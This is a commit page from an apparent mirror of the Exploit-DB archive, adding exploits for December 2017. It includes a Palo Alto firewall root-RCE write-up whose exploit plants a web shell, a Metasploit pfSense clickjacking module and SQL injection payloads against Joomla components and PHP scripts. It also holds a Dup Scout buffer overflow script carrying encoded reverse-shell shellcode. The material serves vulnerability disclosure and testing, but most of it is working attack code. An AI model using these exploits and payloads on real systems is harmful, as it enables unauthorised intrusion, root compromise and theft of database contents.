bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-12-15

Browse source 
13 changes to exploits/shellcodes

Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH)
Microsoft Office - DDE Payload Delivery (Metasploit)
Dup Scout Enterprise - Login Buffer Overflow (Metasploit)
pfSense 2.4.1 - CSRF Error Page Clickjacking (Metasploit)
Palo Alto Networks Firewalls - Remote root Code Execution
Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection
Joomla! Component JEXTN Video Gallery 3.0.5 - 'id' SQL Injection
Readymade Video Sharing Script 3.2 - HTML Injection
Paid To Read Script 2.0.5 - 'uid' / 'fnum' / 'fn' SQL Injection
FS Lynda Clone 1.0 - SQL Injection
Bus Booking Script 1.0 - 'txtname' SQL Injection
Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection
Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)
This commit is contained in:
Offensive Security 2017-12-15 05:02:23 +00:00
parent 0f0a6efff9
commit ed1c4edf3e
14 changed files with 1178 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

234
exploits/hardware/remote/43342.txt Normal file
View file

@ -0,0 +1,234 @@
This is a public advisory for CVE-2017-15944 which is a remote root code
execution bug in Palo Alto Networks firewalls.
Three separate bugs can be used together to remotely execute commands as
root through the web management interface without authentication on: PAN-OS
6.1.18 and earlier, PAN-OS 7.0.18 and earlier, PAN-OS 7.1.13 and earlier,
PAN-OS 8.0.5 and earlier.
Palo Alto Networks recommends not exposing the web management interface to
the internet. By looking at Project Sonar or Shodan it is evident that it's
actually quite common to deploy the firewalls with the web management
interface listening on the WAN port.
PAN-OS 6.1.19, PAN-OS 7.0.19, PAN-OS 7.1.14 and PAN-OS 8.0.6 are patched
and can be downloaded from https://support.paloaltonetworks.com/
=*=*=*=*=*=*=*=*= TIMELINE
2017-07-09: Report submitted.
2017-07-11: Palo Alto Networks PSIRT confirm that they received the report
and assign PDV-348 for tracking the issues.
2017-12-05: The bugs are made public by Palo Alto Networks at
https://securityadvisories.paloaltonetworks.com
2017-12-11: I send out this public advisory.
=*=*=*=*=*=*=*=*= DESCRIPTION
- Bug #1: Partial authentication bypass
The file `/etc/appweb3/conf/common.conf` contains the web configuration for
the web server that handles the web management interface.
It configures an authentication filter on most subdirectories using the
following format:
<Location /php>
panAuthCheck on
</Location>
This means that all requests to /php/* will be checked for an authenticated
session cookie. The functionality itself is implemented in the
`libpanApiWgetFilter.so` library file.
The function `openAuthFilter()` will look for the PHPSESSID cookie and then
call the `readSessionVarsFromFile()` function on the session file to
extract the `dloc` and `user` values.
The problem is that `readSessionVarsFromFile()` is not using the official
PHP functions to read the serialized session data, but its own parser using
`strtok()` which is not implemented correctly.
The PHP session format which `readSessionVarsFromFile()` tries to parse
looks like this for string values:
locale|s:2:"en";
Explained:
var_name|s:str_length:"string value"; var_name|s:str_length:"another
string";...
If we can inject a value into the session file that contains the `";`
character sequence, we can break the parser and inject our own value for
the `user` variable.
We can do this by calling the `/esp/cms_changeDeviceContext.esp` script,
which does not need any kind of authentication to be called.
It will call the `panUserSetDeviceLocation()` function located in
`panmodule.so`, which splits the `dloc` GET parameter by ":" and sets the
`dloc` and `loc` session variables to the second value.
We can corrupt the session file by calling the following url:
`/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";`
Which produces the following contents in `/tmp/sess_<sessionid>`:
`dloc|s:20:"8:a'";user|s."1337";";loc|s:27:"16:a'";user|s."1337";:vsys1";`
When this is parsed by the `readSessionVarsFromFile()` function, it will
extract `16:a'` as the value for the `user` variable.
It will then use this in XML requests to the backend to check if the user
is authenticated, but this produces an XML injection that results in an
invalid XML document:
```
Entity: line 1: parser error : attributes construct error
<request cmd='op' cookie='16:a'' refresh='no'><operations
xml='yes'><show><cli>
```
The extra single quote character is injected into the cookie value, which
makes the request fail because of a parser error. Interestingly enough, the
`panCheckSessionExpired()` function in `libpanApiWgetFilter.so` does not
recognize this unexpected state and believes that authentication has
succeeded.
We can now access any PHP file protected by the panAuthCheck directive
using our manipulated session cookie.
Example:
imac:~/pa% curl -H "Cookie: PHPSESSID=hacked;" 10.0.0.1/php/utils/debug.php
<!DOCTYPE html>
<html><head><title>Moved Temporarily</title></head>
<body><h1>Moved Temporarily</h1>
<p>The document has moved <a href="http://10.0.0.1:28250/php/logout.php
">here</a>.</p>
<address>PanWeb Server/ - at 127.0.0.1:28250 Port 80</address></body>
</html>
imac:~/pa% curl -H "Cookie: PHPSESSID=hacked;" '
10.0.0.1/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'
@start@Success@end@
imac:~/pa% curl -H "Cookie: PHPSESSID=hacked;" 10.0.0.1/php/utils/debug.php
2>/dev/null|head -30
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "
http://www.w3.org/TR/html4/loose.dtd";>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Debug Console</title>
It's important to note that we still don't have a valid, logged in session.
Most PHP scripts will fail, but we do bypass the authentication check in
the web server.
- Bug #2: Arbitrary directory creation
The `/php/utils/router.php` file handles API requests for the web
management interface backend communication. It exposes most of the PHP
classes that comprise the web application in a simple remote procedure call
interface over HTTP POST/JSON.
The `/php/device/Administrator.php` file declares the `Administrator`
class. It contains a method called `get` that we can call from `router.php`.
In the `get` method there is an XML injection in the call to
`Direct::getConfigByXpath`. The `jsonArgs->id` parameter is appended to the
request without any sanitation. This allows us to manipulate the XML
request that is sent to the backend.
Normal request:
<request cmd="get" obj="/config/mgt-config/users/entry[@name='admin']"
cookie="12312312312"/>
We can inject our own values into the end of the `obj` attribute, and
therefore control all of the remaining XML request.
The `pan_cfg_req_ctxt_construct()` function in `libpanmp_mp.so` handles the
parsing of XML requests in the backend.
If we send a request tag with the `async-mode='yes'` attribute set, the
backend will create a temporary file and parent directory in
`/opt/pancfg/session/pan/user_tmp/<cookie value>/<jobid>.xml` that contains
the output of the request.
Since we can control the `<cookie value>` part of the created directory
structure, we can use a directory traversal attack to create a directory
with an arbitrary name anywhere on the system.
For example, by sending the following crafted POST request:
{"action":"PanDirect","method":"execute","data":
["07c5807d0d927dcd0980f86024e5208b","Administrator.get",
{"changeMyPassword":true,"template":"asd","id":"admin']\"
async-mode='yes' refresh='yes'
cookie='../../../../../../tmp/hacked'/>\u0000"}],"type":"rpc","tid":713}
The backend receives the following XML request, resulting in the
`/tmp/hacked` directory being created:
<request cmd="get" obj="/config/mgt-config/users/entry[@name='admin']"
async-mode="yes" refresh="yes" cookie="../../../../../../tmp/hacked"/>
- Bug #3: Command injection in cron script
There is a cron entry that executes `/usr/local/bin/genindex_batch.sh`
every 15 minutes.
This shellscript will in turn execute `/usr/local/bin/genindex.sh` to
generate indexes from database files in `/opt/pancfg/mgmt/logdb/`.
There is a command injection vulnerability in how this shellscript handles
filename processing:
<redacted at the request of PA networks>
Since we can create directories in `$PAN_BASE_DIR/logdb/$dir/1`, we are
able to influence the output of the first `find` command.
This output is then used as an argument in the second execution of `find`,
but without enclosing quotes. We can therefore inject arbitrary arguments
in this invocation. By passing the `-exec` option to `find`, we can make it
execute arbitrary system commands.
My exploit creates a directory called:
`* -print -exec python -c exec("[base64 code..]".decode("base64")) ;`
The base64-encoded python code will be executed as root, which creates a
simple web shell in `/var/appweb/htdocs/api/c.php` as well as a suid root
wrapper in `/bin/x`.
=*=*=*=*=*=*=*=*= EXPLOIT OUTPUT
imac:~/pa% python panos-rce.py http://10.0.0.1/
creating corrupted session...
http://10.0.0.1/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27
";user|s."1337";
done, verifying..
http://10.0.0.1/php/utils/debug.php
panAuthCheck bypassed
verifying that directory creation works..
http://10.0.0.1/php/utils/router.php/Administrator.get
http://10.0.0.1/api/test/202.xml
creating /opt/pancfg/mgmt/logdb/traffic/1/ entry
shell at http://10.0.0.1/api/c.php should be created in 8 minutes.. please
wait
web shell created, rootshell accessible with /bin/x -p -c 'command'
uid=99(nobody) gid=99(nobody) euid=0(root)
Linux PA-3060 2.6.32.27-7.1.10.0.30 #1 SMP Thu May 4 20:10:01 PDT 2017
x86_64 x86_64 x86_64 GNU/Linux
$
=*=*=*=*=*=*=*=*= CREDIT
Philip Pettersson

153
exploits/php/remote/43341.rb Executable file
View file

@ -0,0 +1,153 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Clickjacking Vulnerability In CSRF Error Page pfSense',
'Description' => %q{
This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1.
pfSense is a free and open source firewall and router. It was found that the
pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin
into interacting with a specially crafted webpage it is possible for an attacker
to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user,
this will result in a full compromise of the pfSense instance.
},
'Author' => 'Yorick Koster',
'Payload' => { 'BadChars' => '"' },
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://securify.nl/en/advisory/SFY20171101/clickjacking-vulnerability-in-csrf-error-page-pfsense.html'],
['URL', 'https://doc.pfsense.org/index.php/2.4.2_New_Features_and_Changes']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
[ 'pfSense <= 2.4.1', { 'auto' => false } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 21 2017'
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the web application', 'https://192.168.1.1'])
]
)
end
def js_file
@js ||= lambda {
path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'cookieconsent.min.js')
return File.read(path)
}.call
end
def css_file
@css ||= lambda {
path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'cookieconsent.min.css')
return File.read(path)
}.call
end
def background_file
@background ||= lambda {
path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'background.jpg')
return File.read(path)
}.call
end
def on_request_uri(cli, request)
print_status("GET #{request.uri} #{request.headers['User-Agent']}")
resp = create_response(200, "OK")
if request.uri =~ /\.js$/
resp.body = js_file
resp['Content-Type'] = 'text/javascript'
elsif request.uri =~ /\.css$/
resp.body = css_file
resp['Content-Type'] = 'text/css'
elsif request.uri =~ /\.jpg$/
resp.body = background_file
resp['Content-Type'] = 'image/jpg'
else
if datastore['TARGETURI'].end_with? '/'
url = datastore['TARGETURI'] + 'diag_command.php'
else
url = datastore['TARGETURI'] + '/diag_command.php'
end
framename = rand_text_alpha(16)
divname = rand_text_alpha(16)
resp.body = %Q|<!DOCTYPE html>
<html>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="#{get_resource.chomp('/')}/cookieconsent.min.css" />
<script src="#{get_resource.chomp('/')}/cookieconsent.min.js"></script>
<script>
window.addEventListener("load", function(){
window.cookieconsent.initialise({
"palette": {
"popup": {
"background": "#000",
"text": "#0f0"
},
"button": {
"background": "#0f0"
}
},
"position": "top",
"static": true
});
});
</script>
<script>
document.cookie = 'cookieconsent_status=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
window.addEventListener('load', function(){
document.forms[0].post.click();
document.onmousemove = function(e) {
var e = e \|\| window.event;
var s = document.getElementById('#{divname}');
s.style.left = (e.clientX - 10) + 'px';
s.style.top = (e.clientY - 5) + 'px';
};
});
</script>
<body style="background-image:url(#{get_resource.chomp('/')}/background.jpg);background-size:cover;">
<div id="#{divname}" style="position:absolute;z-index:10;border:none;width:20px;height:10px;overflow:hidden;opacity:0.0;">
<iframe src="about:blank" name="#{framename}" sandbox="allow-forms" border="no" scrolling="no" width="800" height="800" style="width:400px;height:800px;margin-top:-70px;margin-left:-40px;"></iframe>
</div>
<div style="display:none">
<form action="#{url}" method="POST" enctype="multipart/form-data" target="#{framename}">
<input type="hidden" name="txtPHPCommand" value="#{payload.encoded}" />
<input type="hidden" name="submit" value="EXECPHP" />
<input type="submit" name="post"/>
</form>
</div>
</body>
</html>
|
resp['Content-Type'] = 'text/html'
end
cli.send_response(resp)
end
end

36
exploits/php/webapps/43329.txt Normal file
View file

@ -0,0 +1,36 @@
# # # # #
# Exploit Title: Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection
# Dork: N/A
# Date: 13.12.2017
# Vendor Homepage: http://jextn.com/
# Software Link: https://extensions.joomla.org/extensions/extension/communication/question-a-answers/jextn-question-and-answer/
# Version: 3.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php/en/component/jequestions/?view=tags&an=[SQL]
#
# %2dVerAyari'%20%2f*!06666UNION*%2f%20%2f*!06666SELECT*/%201%2c(SELECT%20GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_SCHEMA=DATABASE())%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2c17%2c18%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2d%2d%20%2d
#
#
# 2)
# <html>
# <body>
# <form name="pagination" action="http://localhost/index.php/en/component/jequestions/" method="post">
# <input name="ques-srch" value="1'and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='" type="hidden">
# <button id="que_srch">Ver Ayari</button>
# </form>
# </body>
# </html>
# # # # #

27
exploits/php/webapps/43330.txt Normal file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Joomla! Component JEXTN Video Gallery 3.0.5 - SQL Injection
# Dork: N/A
# Date: 13.12.2017
# Vendor Homepage: http://jextn.com/
# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jextn-video-gallery/
# Version: 3.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jevideogallery&view=category&id=99[SQL]
#
# 99%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR)%2c0x7e,0x496873616e53656e63616e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)
#
#
# # # # #

26
exploits/php/webapps/43333.txt Normal file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Readymade Video Sharing Script 3.2 - HTML Injection
# Dork: N/A
# Date: 13.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/
# Demo: http://www.smsemailmarketing.in/demo/videosharing/
# Version: 3.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17649
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability implication allows an attacker to inject html code ....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&comment=[CODE]&comment_submit=
#
#
# # # # #

39
exploits/php/webapps/43334.txt Normal file
View file

@ -0,0 +1,39 @@
# # # # #
# Exploit Title: Paid To Read Script 2.0.5 - SQL Injection
# Dork: N/A
# Date: 13.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/paid-to-read-script/
# Version: 2.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17651
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/admin/userview.php?uid=[SQL]
#
# -9++/*!08888UNION*/(/*!08888SELECT*/(1)%2c(2)%2c(3)%2c(4)%2c(5)%2c(6)%2c(7)%2c(8)%2c(9)%2c(10)%2c(11)%2c(12)%2c(13)%2c(14)%2c(15)%2c(16)%2c(17)%2c(18)%2c(19)%2c(20)%2c(21)%2c(22)%2c(23)%2c(24)%2c(25)%2c(26)%2c(27)%2c(28)%2c(29)%2c(30)%2c(31)%2c(32)%2c(33)%2c(34)%2c(35)%2c(36)%2c(37)%2c(38)%2c(39)%2c(40)%2c(41)%2c(42)%2c(43)%2c(44)%2c(45)%2c(46)%2c(47)%2c(48)%2c(/*!08888Select*/+export_set(5%2c@:=0%2c(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5%2cexport_set(5%2c@%2c/*!08888table_name*/%2c0x3c6c693e%2c2)%2c/*!08888column_name*/%2c0xa3a%2c2))%2c@%2c2))%2c(50)%2c(51)%2c(52)%2c(53)%2c(54)%2c(55)%2c(56)%2c(57)%2c(58)%2c(59)%2c(60)%2c(61)%2c(62)%2c(63)%2c(64)%2c(65)%2c(66)%2c(67)%2c(68))--+-
#
#
# 2)
# http://localhost/[PATH]/admin/viewemcamp.php?fnum=[SQL]
#
# -1++/*!08888UNION*/(/*!08888SELECT*/+0x253238253331253239%2cCONCAT_WS(0x203a20%2cUSER()%2cDATABASE()%2cVERSION())%2c0x253238253333253239%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239)--+-
#
#
# 3)
# http://localhost/[PATH]/admin/viewvisitcamp.php?fn=[SQL]
#
# -6++/*!50000UNION*/(/*!50000SELECT*/0x253238253331253239%2c0x253238253332253239%2c0x253238253333253239%2c0x253238253334253239%2cCONCAT_WS(0x203a20%2cUSER()%2cDATABASE()%2cVERSION())%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239%2c0x253238253331253333253239%2c0x253238253331253334253239)--+-
#
#
# # # # #

29
exploits/php/webapps/43335.html Normal file
View file

@ -0,0 +1,29 @@
<!--
# # # # #
# Exploit Title: FS Lynda Clone 1.0 - SQL Injection
# Dork: N/A
# Date: 13.12.2017
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/lynda-clone/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17643
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
-->
<html>
<body>
<form action="http://localhost/tutorial/" method="post">
<input value="1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e,0x494853414e2053454e43414e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -" name="keywords" id="keywords" type="search">
<input value="GO" type="submit">
</form>
</body>
</html>

29
exploits/php/webapps/43336.html Normal file
View file

@ -0,0 +1,29 @@
<!--
# # # # #
# Exploit Title: Bus Booking Script 1.0 - SQL Injection
# Dork: N/A
# Date: 13.12.2017
# Vendor Homepage: http://www.phpautoclassifiedscript.com/
# Software Link: http://www.phpautoclassifiedscript.com/bus-booking-script.html
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17645
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
-->
<html>
<body>
<form action="http://localhost/newbusbooking/admin/index.php" method="post" enctype="application/x-www-form-urlencoded" name="frmlogin" target="_self">
<input name="txtname" type="text" value="' UNION ALL SELECT 0x31,0x564552204159415249,0x33,0x34,0x35-- Ver Ayari"></div>
<input name="logbut" id="logbut" type="submit"></div>
</form>
</body>
</html>

40
exploits/php/webapps/43337.txt Normal file
View file

@ -0,0 +1,40 @@
# # # # #
# Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection
# Dork: N/A
# Date: 12.12.2017
# Vendor Homepage: http://piwigo.org/
# Software Link: http://piwigo.org/basics/downloads
# Version: <= 2.9.1
# Category: Webapps
# Tested on: WiN7_x64/WIN10_X64
# CVE: CVE-2017-10682
# # # # #
# Exploit Author: Akityo
# Email: akityo@foxmail.com
# # # # #
# Description:
#
# SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter
# in the comments or status page to cat_options.php.
#
#
# # # # #
# Proof-of-Concent:
#
# POST /[path]/admin.php?page=cat_options&section=status HTTP/1.1
# Host: www.test.com
# Content-Length: 34
# Cache-Control: max-age=0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
# Content-Type: application/x-www-form-urlencoded
# Accept-Encoding: gzip, deflate
# Accept-Language: zh-CN,zh;q=0.8
# Cookie: null
# Connection: close
#
# cat_false%5B%5D=[payload here]&trueify=%C2%AB
#
#
# # # # #

153
exploits/windows/remote/43202.py Executable file
View file

@ -0,0 +1,153 @@
#!/usr/bin/python
import struct
########################################################################################################
# Exploit Author: Miguel Mendez Z
# Exploit Title: Dup Scout Enterprise v10.0.18 "Input Directory" Local Buffer Overflow - SEH Unicode
# Date: 29-11-2017
# Software: Dup Scout Enterprise
# Version: v10.0.18
# Vendor Homepage: http://www.dupscout.com
# Software Link: http://www.dupscout.com/setups/dupscoutent_setup_v10.0.18.exe
# Tested on: Windows 7 x86
########################################################################################################
'''
[+] Paso 1
Bytes Validos:
\x21\x23\x2a\x2b\x2d\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a
\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f
\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x61\x62\x63\x64\x65
\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75
\x76\x77\x78\x79\x7a
----------
[+] Paso 2:
Align ESP:
popad * 49
----------
[+] Paso 3:
Assembly Align EAX:
xor eax,eax
push esp
pop eax
pop ecx
add eax 1c
jmp eax -----> (inicio shellcode)
----------
[+] Paso 4:
Codificacion:
and eax,554E4D4A
and eax,2A313235
sub eax,65656565
sub eax,65654C65
sub eax,54363176
push eax
sub eax,33354D35
sub eax,2A707737
push eax
Byte Paste:
254A4D4E55253532312A2D656565652D654C65652D76313654502D354D35332D3777702A50
'''
popad = "\x61"*49
alignEsp = popad+(
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31"
"\x2A\x2D\x65\x65\x65\x65\x2D\x65\x4C"
"\x65\x65\x2D\x76\x31\x36\x54\x50\x2D"
"\x35\x4D\x35\x33\x2D\x37\x77\x70\x2A"
"\x50"
)
'''
msfvenom -p windows/exec CMD=calc > calc.raw && ./alpha2 eax < calc.raw)
msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -f python
'''
shellcodeTest = (
"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8A"
"BuJIylIxNbWpwpwpQpMYyup1kp3TNk0PTpLKPRflLKv2uDnk"
"42uxtOoGaZwVea9oNLGL3QCLtBFLUpo1zoVmgqKwKRxrrrrw"
"LK62tPLKBjUlnk0LdQBXJCPHEQHQRqlK0YepwqN3lKRivxKS"
"wJaYLKTtLKvaXVvQKOLlKqhO6meQkw4xkP1ekFESqmxxWKam"
"7TBUKTBxNkchgTfaN3PfNkDLRklKshuLc1n3nk6dNk7qJpNi"
"QT14Q4aKSkSQV91JF1KOKPqO1O2zLKfrxknmqMrJS1LMNeoB"
"Wpgp5PpP58VQNk2Oow9oXUoKxpNUoRrvU8oVoeoMMMKOxUWL"
"eV3L4JMPKKKPrUTEoKswtSRRROcZePrsKOZu3SSQPlPcePA"
)
#msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/alpha_mixed BufferRegister=EAX -f python
shellcode = "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x4b\x4c\x79\x78\x6f\x72\x57\x70\x77\x70\x55\x50\x45"
shellcode += "\x30\x4d\x59\x49\x75\x46\x51\x4b\x70\x55\x34\x6e\x6b"
shellcode += "\x70\x50\x30\x30\x4e\x6b\x56\x32\x46\x6c\x6c\x4b\x66"
shellcode += "\x32\x46\x74\x6e\x6b\x62\x52\x44\x68\x34\x4f\x4f\x47"
shellcode += "\x73\x7a\x45\x76\x55\x61\x39\x6f\x4c\x6c\x47\x4c\x35"
shellcode += "\x31\x53\x4c\x35\x52\x44\x6c\x65\x70\x5a\x61\x58\x4f"
shellcode += "\x74\x4d\x45\x51\x6a\x67\x48\x62\x4b\x42\x46\x32\x62"
shellcode += "\x77\x4e\x6b\x51\x42\x62\x30\x4c\x4b\x70\x4a\x37\x4c"
shellcode += "\x6e\x6b\x32\x6c\x74\x51\x33\x48\x6a\x43\x71\x58\x66"
shellcode += "\x61\x6a\x71\x50\x51\x4e\x6b\x63\x69\x75\x70\x37\x71"
shellcode += "\x7a\x73\x4c\x4b\x52\x69\x45\x48\x58\x63\x54\x7a\x30"
shellcode += "\x49\x6e\x6b\x34\x74\x4e\x6b\x56\x61\x49\x46\x34\x71"
shellcode += "\x69\x6f\x4e\x4c\x6f\x31\x78\x4f\x54\x4d\x66\x61\x68"
shellcode += "\x47\x76\x58\x6d\x30\x72\x55\x48\x76\x74\x43\x63\x4d"
shellcode += "\x48\x78\x65\x6b\x31\x6d\x74\x64\x42\x55\x58\x64\x31"
shellcode += "\x48\x6c\x4b\x53\x68\x47\x54\x37\x71\x39\x43\x73\x56"
shellcode += "\x4e\x6b\x66\x6c\x72\x6b\x6c\x4b\x36\x38\x35\x4c\x43"
shellcode += "\x31\x38\x53\x6c\x4b\x35\x54\x4c\x4b\x67\x71\x58\x50"
shellcode += "\x4c\x49\x72\x64\x75\x74\x66\x44\x43\x6b\x63\x6b\x31"
shellcode += "\x71\x46\x39\x32\x7a\x32\x71\x79\x6f\x6b\x50\x43\x6f"
shellcode += "\x31\x4f\x50\x5a\x4c\x4b\x52\x32\x48\x6b\x6e\x6d\x31"
shellcode += "\x4d\x45\x38\x55\x63\x74\x72\x33\x30\x47\x70\x53\x58"
shellcode += "\x43\x47\x74\x33\x47\x42\x31\x4f\x63\x64\x70\x68\x62"
shellcode += "\x6c\x62\x57\x74\x66\x43\x37\x59\x6f\x58\x55\x4d\x68"
shellcode += "\x6e\x70\x55\x51\x33\x30\x53\x30\x55\x79\x59\x54\x53"
shellcode += "\x64\x56\x30\x53\x58\x56\x49\x4f\x70\x30\x6b\x33\x30"
shellcode += "\x49\x6f\x4a\x75\x62\x70\x66\x30\x72\x70\x42\x70\x51"
shellcode += "\x50\x52\x70\x71\x50\x46\x30\x53\x58\x58\x6a\x36\x6f"
shellcode += "\x79\x4f\x4b\x50\x59\x6f\x6e\x35\x6e\x77\x61\x7a\x56"
shellcode += "\x65\x72\x48\x71\x6f\x75\x50\x45\x50\x46\x61\x63\x58"
shellcode += "\x53\x32\x37\x70\x56\x65\x47\x49\x6f\x79\x4a\x46\x53"
shellcode += "\x5a\x74\x50\x66\x36\x33\x67\x50\x68\x6e\x79\x6e\x45"
shellcode += "\x54\x34\x31\x71\x6b\x4f\x78\x55\x4f\x75\x6f\x30\x64"
shellcode += "\x34\x56\x6c\x49\x6f\x50\x4e\x36\x68\x64\x35\x58\x6c"
shellcode += "\x43\x58\x6c\x30\x6f\x45\x4c\x62\x30\x56\x39\x6f\x59"
shellcode += "\x45\x35\x38\x73\x53\x70\x6d\x35\x34\x45\x50\x6e\x69"
shellcode += "\x49\x73\x70\x57\x56\x37\x73\x67\x56\x51\x39\x66\x31"
shellcode += "\x7a\x75\x42\x36\x39\x36\x36\x58\x62\x39\x6d\x31\x76"
shellcode += "\x49\x57\x52\x64\x46\x44\x75\x6c\x53\x31\x63\x31\x6e"
shellcode += "\x6d\x31\x54\x57\x54\x42\x30\x5a\x66\x35\x50\x62\x64"
shellcode += "\x30\x54\x42\x70\x76\x36\x33\x66\x30\x56\x31\x56\x71"
